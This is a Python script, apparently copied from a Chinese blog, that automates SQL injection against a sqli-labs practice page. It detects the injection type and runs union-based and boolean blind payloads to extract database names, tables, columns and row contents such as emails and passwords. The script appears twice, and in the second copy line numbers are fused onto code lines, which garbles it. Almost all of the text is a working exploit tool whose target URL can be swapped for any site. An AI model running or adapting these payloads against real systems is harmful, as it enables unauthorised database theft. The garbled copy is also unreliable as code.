return TestUnion(dic2[Type], Lie, union,bPrint,bPrint2)
def n5():
global Type
# 查询列的内容
str1 = input('''
请输入需要查询的表名
''')
str2 = input('''
请输入需要查询的列名
''')
NeiRong = 'group_concat({})'.format(str2)
union = 'FROM+{}+'.format(str1)
TestUnion(dic2[Type], NeiRong, union)
def union():
while True:
num = int(input('''
请输入
1:查询数据库
2:查询数据库版本
3:查询表格
4:查询列名
5:查询内容
6:查询指定表格所有内容
'''))
if num == 1:
n1()
elif num == 2:
n2()
elif num == 3:
n3()
elif num == 4:
n4()
elif num == 5:
n5()
elif num == 6:
# 查询所有列的内容
name = input('''
请输入需要查询的表名
''')
list = n4(name, False)
for l in list:
union = 'FROM+{}+'.format(name)
NeiRong = 'group_concat({})'.format(l)
TestUnion(dic2[Type], NeiRong, union, bPrint2=False)
#盲注-----------------------------------------------------------------------------------------------
def printtitle(palyload):
print('')
table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'],)
table.add_row([url, '是', palyload, '布尔盲注', 'Get'])
print(table)
def GetSchemaLen(palyload0, PalyloadType):
global SchenaName, SchemaLen, dic2, url
url0 = url + palyload0
resLen0 = HackRequests.http(url0, headers=headers)
for i in range(20):
LenghtUrl = url + PalyloadType + '+and+length(database())+=+{}+--+'.format(i)
time.sleep(0.3)
resLen1 = HackRequests.http(LenghtUrl, headers=headers)
if resLen0.text() == resLen1.text():
SchemaLen = i
break
# print('数据库名称长度:{}'.format(SchemaLen))
def GetSchenaName(palyload0, palyloadType):
global SchenaName, SchemaLen, dic2, url,Type
str = 'security_.abcdefghijklmnopqrstuvwxyz1234567890+@'
i=0;
p=0
for i in range(1, SchemaLen + 1):
for s in str:
p=p + 1;
palyloadNameNew = palyloadType + 'and+substr(database(),{},1)=\'{}\'--+'.format(i, s)
if p==1:
printtitle(palyloadNameNew)
# print(palyloadNameNew)
url0 = url + palyload0
resLen0 = HackRequests.http(url0, headers=headers)
NameUrl = url + palyloadNameNew
time.sleep(0.3)
resName1 = HackRequests.http(NameUrl, headers=headers)
if resLen0.text() == resName1.text():
SchenaName = SchenaName + s
print(s, end='')
break
print('')
table = PrettyTable(['数据库:'])
table.add_row([SchenaName])
print(table)
return SchenaName
def GetTableName(palyload0, palyloadType, SchenaName='database()'):
global SchemaLen, dic2, url
allLen = 0
for i in range(1, 10000):
palyload = palyloadType + 'and+length((select+group_concat(TABLE_NAME)+FROM+information_schema.TABLES+where+table_schema=' + SchenaName + '))+=+{}+--+'.format(
i)
url0 = url + palyload0
resLen0 = HackRequests.http(url0, headers=headers)
NameUrl = url + palyload
time.sleep(0.3)
resName1 = HackRequests.http(NameUrl, headers=headers)
if resLen0.text() == resName1.text():
allLen = i
break
# 求名称
str = 'emails,rfugntbcdhjkopqvwxyz_123456789@!+'
strName = ''
n = 1
p=0
# print('{}数据库的所有数据库表名:'.format(SchenaName))
for i in range(1, allLen + 1):
for s in str:
p = p + 1
palyload = palyloadType + 'and+substr((select+group_concat(TABLE_NAME)+FROM+information_schema.TABLES+where+table_schema=database()),{},1)=\'{}\'--+'.format(n, s)
if p==1:
printtitle(palyload)
url0 = url + palyload0
resLen0 = HackRequests.http(url0, headers=headers)
NameUrl = url + palyload
time.sleep(0.3)
resName1 = HackRequests.http(NameUrl, headers=headers)
# if resLen0.text() == resName1.text():
if resLen0.text() == resName1.text():
strName = strName + s
n = n + 1
print(s, end='')
# if s == ',':
# print('')
break
list = strName.split(',')
print('')
table = PrettyTable([SchenaName])
list = strName.split(',')
for str in list:
table.add_row([str])
print(table)
return list
def GetColumns(palyload0, palyloadType,table_name,SchenaName='database()'):
global SchemaLen, dic2, url
# 查询有多少个字段
allLen = 0
for i in range(1, 10000):
palyload = palyloadType + 'and+((+select+count(column_name)+from+information_schema.columns+where+table_schema={}+and+table_name={}))={}+--+'.format(SchenaName,table_name,i)
url0 = url + palyload0
resLen0 = HackRequests.http(url0, headers=headers)
NameUrl = url + palyload
resName1 = HackRequests.http(NameUrl, headers=headers)
if resLen0.text() == resName1.text():
allLen = i
break
# print('总共有{}列字段'.format(allLen))
# #求名称
str = 'idemals,rfugntbchjkopqvwxyz_.'
strName = ''
p = 0
for i in range(allLen + 1):
n = 0
n1 = 0
while True:
if i == allLen:
break
s = str[n1]
n1 = n1 + 1
palyload = palyloadType + 'and+substr((concat((select+column_name+from+information_schema.columns+where+table_schema={}+and+table_name={}+limit+{},1),\',\')+),{},1)=\'{}\'--+'.format(SchenaName,table_name,i, n+1, s)
p = p + 1
if p == 1:
printtitle(palyload)
url0 = url + palyload0
time.sleep(0.1)
resLen0 = HackRequests.http(url0, headers=headers)
NameUrl = url + palyload
resName1 = HackRequests.http(NameUrl, headers=headers)
if resLen0.text() == resName1.text():
strName = strName + s
print(s,end='')
n = n + 1
n1 = 0
if s == ',':
break
# print('列名:', strName)
print('')
table = PrettyTable(['column_name'])
list = strName.split(',')
for str in list:
table.add_row([str])
print(table)
def GetContext(palyload0, palyloadType, ku, biao, lie):
global SchenaName, SchemaLen, dic2, url
# 查询有多少行
allLen = 0
for i in range(1, 10000):
palyload = palyloadType + 'and+((+select+count(email_id)+from+' + ku + '.' + biao + '))={}+--+'.format(i)
# palyload = palyloadType + 'and+((+select+count(email_id)+from+security.emails))={}+--+'.format(i)
url0 = url + palyload0
resLen0 = HackRequests.http(url0, headers=headers)
NameUrl = url + palyload
resName1 = HackRequests.http(NameUrl, headers=headers)
if resLen0.text() == resName1.text():
allLen = i
break
print(ku + '数据库{}表{}字段总共有{}行内容'.format(biao, lie, allLen))
# #求名称
str = 'hakndumb@coi.lvesup+,rfgtbjqwxyz_1234567890hakndumb@coi.lvesup+,rfgtbjqwxyz_1234567890'
strName = ''
'''
Dummy@dhakkan.local Angel@iloveu.com secure@dhakkan.local stupid@dhakkan.local superman@dhakkan.local batman@dhakkan.local admin@dhakkan.com
'''
print('{}:'.format(lie))
# 一共有allLen列数据,循环allLen次,allLen+1次时,break
p=0
for i in range(allLen + 1):
n = 1
n1 = 0
while True:
p = p + 1
if i == allLen:
break
s = str[n1]
n1 = n1 + 1
palyload = palyloadType + 'and+substr((concat((select+' + lie + '+from+' + ku + '.' + biao + '+limit+{},1),\',\')),{},1)=\'{}\'--+'.format(i, n, s)
if p==1:
printtitle(palyload)
# palyload = palyloadType + 'and+substr( ( concat( (select+'+lie+'+from+'+ku+'.'+biao+'+limit+{},1), \',\') ) ,{},1)=\'{}\'--+'.format( i, n, s)
url0 = url + palyload0
resLen0 = HackRequests.http(url0, headers=headers)
NameUrl = url + palyload
resName1 = HackRequests.http(NameUrl, headers=headers)
if resLen0.text() == resName1.text():
strName = strName + s
print(s, end='')
n = n + 1
n1 = 0
time.sleep(0.3)
if s == ',':
break
print('')
table = PrettyTable([lie])
list = strName.split(',')
for str in list:
table.add_row([str])
print(table)
return strName
SchemaLen = 0
SchenaName = ''
def Get():
global SchenaName,SchemaLen,dic2,url,Type,palyload2
statr()
palyload0 = dic2
palyloadType = ['?id=1', '?id=1\'', '?id=1\')', '?id=1\'))', '?id=1"', '?id=1")+', '?id=1"))']
# # 1.查询数据库名称:security
# GetSchemaLen(palyload0=palyload0[Type]+palyload2, PalyloadType=palyloadType[Type])
# SchenaName = GetSchenaName(palyload0=palyload0[Type]+palyload2, palyloadType=palyloadType[Type])
# 查询数据表
# 1.查询长度并查询一共有多少张表
# SchenaName=input('输入数据库名字')
# tablelist = GetTableName(palyload0=palyload0[Type]+palyload2,palyloadType=palyloadType[Type],SchenaName=SchenaName)
# list = ['emails', 'referers', 'uagents', 'users']
# 查询字段
# table_name = '\''+input('输入表名')+'\''
# GetColumns(palyload0=palyload0[Type]+palyload2,palyloadType=palyloadType[Type],SchenaName='database()',table_name='\'emails\'')
# ' id,email_id,id,referer,ip_address,id,uagent,ip_address,username,id,username,password,'
# 查询列内容
# ku = '\''+input('输入库名')+'\''
# biao = '\''+input('输入表名')+'\''
# lie = '\''+input('输入列名')+'\''
# name = GetContext(palyload0=palyload0[Type]+palyload2,palyloadType=palyloadType[Type],ku='security',biao='emails',lie='email_id')
# statr()
Get()
443
1
from prettytable import PrettyTable2
import HackRequests3
from bs4 import BeautifulSoup4
import re5
import time6
7
#1.判断能否注入以及注入类型8
Type=09
dic1 = ['?id=1', '?id=1\'+--+', '?id=1\')+--+1', '?id=1\'))+--+', '?id=1"+--+', '?id=1")+--+', '?id=1"))+--+']10
11
dic2 = ['?id=1+', '?id=1\'+', '?id=1\')+', '?id=1\'))+', '?id=1"+', '?id=1")+', '?id=1"))+']12
palyload2 = 'and+1+--+'13
14
dic3 = ['?id=1+', '?id=1\'+', '?id=1\')+', '?id=1\'))+', '?id=1"+', '?id=1")+', '?id=1"))+']15
palyload3='and+0+--+'16
17
# url = 'http://192.168.213.130/sqli-labs/Less-{}/'18
# url = input('>>输入url')19
headers = {'accept': '', 'accept-encoding': '', 'accept-language': '', 'cache-control': '', 'cookie': '', 'referer': '', 'sec-fetch-dest': '', 'sec-fetch-mode': '', 'sec-fetch-site': '', 'sec-fetch-user': '',20
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'}21
url = 'http://192.168.213.130/sqli-labs/Less-1/'22
# url = input('输入url')23
def statr():24
global Type25
res = HackRequests.http(url, headers=headers)26
post = re.findall('.*?form.*?method="post"', res.text())27
if post == []:28
for i in range(7):29
url1 = url + dic1[i]30
url2 = url + dic2[i]+palyload231
url3 = url + dic3[i]+palyload332
res1 = HackRequests.http(url1, headers=headers)33
res2 = HackRequests.http(url2, headers=headers)34
res3 = HackRequests.http(url3, headers=headers)35
if res2.text() == res1.text() != res3.text():36
Type = i37
break38
if i==6:39
print('')40
table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])41
table.add_row([url, '否', '-------', '不能使用联合查询', 'Get'])42
print(table)43
else:44
print('')45
print('Post型请使用其他程序')46
exit()47
48
#2.测试联合点49
def TestUnion(palyloadType,param,union='',bPrint=True,bPrint2=True):50
global Type51
str = '236987'52
strUnionLine=''53
NumSum=054
palyload=''55
'union select 9991236987 limit 0,1--+'56
for i in range(1,10):57
if i ==1:58
strUnionLine+='999{}'.format(i)+str59
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)60
else:61
strUnionLine+=','+'999{}'.format(i)+str62
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)63
palyloadUnion = palyloadType + palyload64
PalyloadUrl = url + palyloadUnion65
resUion = HackRequests.http(PalyloadUrl, headers=headers)66
ShowNums = re.findall('999(.*?)236987',resUion.text())67
if ShowNums!=[]:68
NumSum = i69
if bPrint ==True and bPrint2==True:70
print('')71
table = PrettyTable(['url', '是否可注入', '注入paload','注入类型','请求方式'])72
table.add_row([url, '是', palyloadType+palyload2,'联合查询','Get'])73
print(table)74
break75
if i == 9:76
print('')77
table = PrettyTable(['url','是否可注入','注入paload' ,'注入类型','请求方式'])78
table.add_row([url,'是',palyloadType+palyload2 ,'不能使用联合查询','Get'])79
print(table)80
print('')81
return82
83
# print(ShowNums)84
ShowNum = int(ShowNums[0])85
#3.构造查询语句86
strUnionLine=''87
for i in range(1, NumSum+1):88
if i == 1:89
strUnionLine += '1'90
elif i == ShowNum:91
strUnionLine +=','+'concat(999,{},236987)'.format(param)92
else:93
strUnionLine += ',' + '1'94
if union=='':95
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)96
else:97
palyload='union+select+{}+'.format(strUnionLine)+union+'+limit+1,1+--+'98
# if strUnionLine =='1,concat(999,group_concat(id),236987),1':99
# dic=['?id=-1+', '?id=-1\'+', '?id=-1\')+and+', '?id=-1\'))+', '?id=-1"+', '?id=-1")+', '?id=-1"))+']100
# global Type101
# palyloadType=dic[Type]102
palyloadUnion = palyloadType + palyload103
PalyloadUrl = url + palyloadUnion104
resUion = HackRequests.http(PalyloadUrl, headers=headers)105
Context = re.findall('999(.*?)236987', resUion.text())106
str = Context[0]107
list =str.split(',')108
str = re.findall('group_concat\((.*?)\)',param)109
110
table = PrettyTable([str[0],])111
for l in list:112
table.add_row([l, ])113
if bPrint==True:114
print(table)115
return list116
#4.解析页面信息,获取查询结果117
118
def n1():119
global Type120
# 查询数据库:security121
ShuJuKu = 'group_concat(database()+)'122
TestUnion(dic2[Type], ShuJuKu)123
124
def n2():125
global Type126
# 查询数据库版本:5.5.53127
BanBen = 'group_concat(version())'128
TestUnion(dic2[Type], BanBen)129
130
def n3():131
global Type132
# 查询所有表格:133
BiaoGe = 'group_concat(table_name)'134
union = 'FROM+information_schema.tables+WHERE+table_schema+=database()'135
# ['emails,referers,uagents,users']136
TestUnion(dic2[Type], BiaoGe,union)137
138
def n4(name='',bPrint=True,bPrint2=True):139
global Type140
# 查询所有列141
Lie = 'group_concat(column_name)'142
if name=='':143
name = input('''144
请输入需要查询的表名145
''')146
union = 'FROM+information_schema.columns+WHERE+table_schema+=database()+and+table_name=\'{}\''.format(name) # emails表:['id,email_id']147
return TestUnion(dic2[Type], Lie, union,bPrint,bPrint2)148
149
def n5():150
global Type151
# 查询列的内容152
str1 = input('''153
请输入需要查询的表名154
''')155
str2 = input('''156
请输入需要查询的列名157
''')158
NeiRong = 'group_concat({})'.format(str2)159
union = 'FROM+{}+'.format(str1)160
TestUnion(dic2[Type], NeiRong, union)161
162
def union():163
while True:164
num = int(input('''165
请输入166
1:查询数据库167
2:查询数据库版本168
3:查询表格169
4:查询列名170
5:查询内容171
6:查询指定表格所有内容172
'''))173
if num == 1:174
n1()175
elif num == 2:176
n2()177
elif num == 3:178
n3()179
elif num == 4:180
n4()181
elif num == 5:182
n5()183
elif num == 6:184
# 查询所有列的内容185
name = input('''186
请输入需要查询的表名187
''')188
list = n4(name, False)189
for l in list:190
union = 'FROM+{}+'.format(name)191
NeiRong = 'group_concat({})'.format(l)192
TestUnion(dic2[Type], NeiRong, union, bPrint2=False)193
194
195
#盲注-----------------------------------------------------------------------------------------------196
def printtitle(palyload):197
print('')198
table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'],)199
table.add_row([url, '是', palyload, '布尔盲注', 'Get'])200
print(table)201
202
203
def GetSchemaLen(palyload0, PalyloadType):204
global SchenaName, SchemaLen, dic2, url205
url0 = url + palyload0206
resLen0 = HackRequests.http(url0, headers=headers)207
for i in range(20):208
LenghtUrl = url + PalyloadType + '+and+length(database())+=+{}+--+'.format(i)209
time.sleep(0.3)210
resLen1 = HackRequests.http(LenghtUrl, headers=headers)211
if resLen0.text() == resLen1.text():212
SchemaLen = i213
break214
# print('数据库名称长度:{}'.format(SchemaLen))215
216
217
def GetSchenaName(palyload0, palyloadType):218
global SchenaName, SchemaLen, dic2, url,Type219
220
str = 'security_.abcdefghijklmnopqrstuvwxyz1234567890+@'221
i=0;222
p=0223
for i in range(1, SchemaLen + 1):224
for s in str:225
p=p + 1;226
palyloadNameNew = palyloadType + 'and+substr(database(),{},1)=\'{}\'--+'.format(i, s)227
if p==1:228
printtitle(palyloadNameNew)229
# print(palyloadNameNew)230
url0 = url + palyload0231
resLen0 = HackRequests.http(url0, headers=headers)232
NameUrl = url + palyloadNameNew233
time.sleep(0.3)234
resName1 = HackRequests.http(NameUrl, headers=headers)235
if resLen0.text() == resName1.text():236
SchenaName = SchenaName + s237
print(s, end='')238
break239
240
print('')241
table = PrettyTable(['数据库:'])242
table.add_row([SchenaName])243
print(table)244
return SchenaName245
246
247
def GetTableName(palyload0, palyloadType, SchenaName='database()'):248
global SchemaLen, dic2, url249
allLen = 0250
for i in range(1, 10000):251
palyload = palyloadType + 'and+length((select+group_concat(TABLE_NAME)+FROM+information_schema.TABLES+where+table_schema=' + SchenaName + '))+=+{}+--+'.format(252
i)253
url0 = url + palyload0254
resLen0 = HackRequests.http(url0, headers=headers)255
NameUrl = url + palyload256
time.sleep(0.3)257
resName1 = HackRequests.http(NameUrl, headers=headers)258
259
if resLen0.text() == resName1.text():260
allLen = i261
break262
# 求名称263
str = 'emails,rfugntbcdhjkopqvwxyz_123456789@!+'264
strName = ''265
n = 1266
p=0267
# print('{}数据库的所有数据库表名:'.format(SchenaName))268
for i in range(1, allLen + 1):269
for s in str:270
p = p + 1271
palyload = palyloadType + 'and+substr((select+group_concat(TABLE_NAME)+FROM+information_schema.TABLES+where+table_schema=database()),{},1)=\'{}\'--+'.format(n, s)272
if p==1:273
printtitle(palyload)274
url0 = url + palyload0275
resLen0 = HackRequests.http(url0, headers=headers)276
NameUrl = url + palyload277
time.sleep(0.3)278
resName1 = HackRequests.http(NameUrl, headers=headers)279
# if resLen0.text() == resName1.text():280
if resLen0.text() == resName1.text():281
strName = strName + s282
n = n + 1283
print(s, end='')284
# if s == ',':285
# print('')286
break287
list = strName.split(',')288
print('')289
table = PrettyTable([SchenaName])290
list = strName.split(',')291
for str in list:292
table.add_row([str])293
print(table)294
return list295
296
297
def GetColumns(palyload0, palyloadType,table_name,SchenaName='database()'):298
global SchemaLen, dic2, url299
# 查询有多少个字段300
allLen = 0301
for i in range(1, 10000):302
palyload = palyloadType + 'and+((+select+count(column_name)+from+information_schema.columns+where+table_schema={}+and+table_name={}))={}+--+'.format(SchenaName,table_name,i)303
304
url0 = url + palyload0305
resLen0 = HackRequests.http(url0, headers=headers)306
NameUrl = url + palyload307
resName1 = HackRequests.http(NameUrl, headers=headers)308
if resLen0.text() == resName1.text():309
allLen = i310
break311
# print('总共有{}列字段'.format(allLen))312
# #求名称313
str = 'idemals,rfugntbchjkopqvwxyz_.'314
strName = ''315
p = 0316
for i in range(allLen + 1):317
n = 0318
n1 = 0319
while True:320
if i == allLen:321
break322
s = str[n1]323
n1 = n1 + 1324
palyload = palyloadType + 'and+substr((concat((select+column_name+from+information_schema.columns+where+table_schema={}+and+table_name={}+limit+{},1),\',\')+),{},1)=\'{}\'--+'.format(SchenaName,table_name,i, n+1, s)325
326
p = p + 1327
if p == 1:328
printtitle(palyload)329
330
url0 = url + palyload0331
time.sleep(0.1)332
resLen0 = HackRequests.http(url0, headers=headers)333
NameUrl = url + palyload334
resName1 = HackRequests.http(NameUrl, headers=headers)335
if resLen0.text() == resName1.text():336
strName = strName + s337
print(s,end='')338
n = n + 1339
n1 = 0340
if s == ',':341
break342
# print('列名:', strName)343
print('')344
table = PrettyTable(['column_name'])345
list = strName.split(',')346
for str in list:347
table.add_row([str])348
print(table)349
350
351
def GetContext(palyload0, palyloadType, ku, biao, lie):352
global SchenaName, SchemaLen, dic2, url353
# 查询有多少行354
allLen = 0355
for i in range(1, 10000):356
palyload = palyloadType + 'and+((+select+count(email_id)+from+' + ku + '.' + biao + '))={}+--+'.format(i)357
# palyload = palyloadType + 'and+((+select+count(email_id)+from+security.emails))={}+--+'.format(i)358
url0 = url + palyload0359
resLen0 = HackRequests.http(url0, headers=headers)360
NameUrl = url + palyload361
resName1 = HackRequests.http(NameUrl, headers=headers)362
if resLen0.text() == resName1.text():363
allLen = i364
break365
print(ku + '数据库{}表{}字段总共有{}行内容'.format(biao, lie, allLen))366
# #求名称367
str = 'hakndumb@coi.lvesup+,rfgtbjqwxyz_1234567890hakndumb@coi.lvesup+,rfgtbjqwxyz_1234567890'368
strName = ''369
'''370
Dummy@dhakkan.local Angel@iloveu.com secure@dhakkan.local stupid@dhakkan.local superman@dhakkan.local batman@dhakkan.local admin@dhakkan.com371
'''372
print('{}:'.format(lie))373
# 一共有allLen列数据,循环allLen次,allLen+1次时,break374
p=0375
for i in range(allLen + 1):376
n = 1377
n1 = 0378
while True:379
p = p + 1380
if i == allLen:381
break382
s = str[n1]383
n1 = n1 + 1384
palyload = palyloadType + 'and+substr((concat((select+' + lie + '+from+' + ku + '.' + biao + '+limit+{},1),\',\')),{},1)=\'{}\'--+'.format(i, n, s)385
if p==1:386
printtitle(palyload)387
# palyload = palyloadType + 'and+substr( ( concat( (select+'+lie+'+from+'+ku+'.'+biao+'+limit+{},1), \',\') ) ,{},1)=\'{}\'--+'.format( i, n, s)388
url0 = url + palyload0389
resLen0 = HackRequests.http(url0, headers=headers)390
NameUrl = url + palyload391
resName1 = HackRequests.http(NameUrl, headers=headers)392
if resLen0.text() == resName1.text():393
strName = strName + s394
print(s, end='')395
n = n + 1396
n1 = 0397
time.sleep(0.3)398
if s == ',':399
break400
print('')401
table = PrettyTable([lie])402
list = strName.split(',')403
for str in list:404
table.add_row([str])405
print(table)406
return strName407
408
409
SchemaLen = 0410
SchenaName = ''411
412
413
def Get():414
global SchenaName,SchemaLen,dic2,url,Type,palyload2415
statr()416
palyload0 = dic2417
palyloadType = ['?id=1', '?id=1\'', '?id=1\')', '?id=1\'))', '?id=1"', '?id=1")+', '?id=1"))']418
419
# # 1.查询数据库名称:security420
# GetSchemaLen(palyload0=palyload0[Type]+palyload2, PalyloadType=palyloadType[Type])421
# SchenaName = GetSchenaName(palyload0=palyload0[Type]+palyload2, palyloadType=palyloadType[Type])422
423
# 查询数据表424
# 1.查询长度并查询一共有多少张表425
# SchenaName=input('输入数据库名字')426
# tablelist = GetTableName(palyload0=palyload0[Type]+palyload2,palyloadType=palyloadType[Type],SchenaName=SchenaName)427
# list = ['emails', 'referers', 'uagents', 'users']428
429
# 查询字段430
# table_name = '\''+input('输入表名')+'\''431
# GetColumns(palyload0=palyload0[Type]+palyload2,palyloadType=palyloadType[Type],SchenaName='database()',table_name='\'emails\'')432
# ' id,email_id,id,referer,ip_address,id,uagent,ip_address,username,id,username,password,'433
434
# 查询列内容435
# ku = '\''+input('输入库名')+'\''436
# biao = '\''+input('输入表名')+'\''437
# lie = '\''+input('输入列名')+'\''438
# name = GetContext(palyload0=palyload0[Type]+palyload2,palyloadType=palyloadType[Type],ku='security',biao='emails',lie='email_id')439
440
441
# statr()442
Get()443
浙公网安备 33010602011771号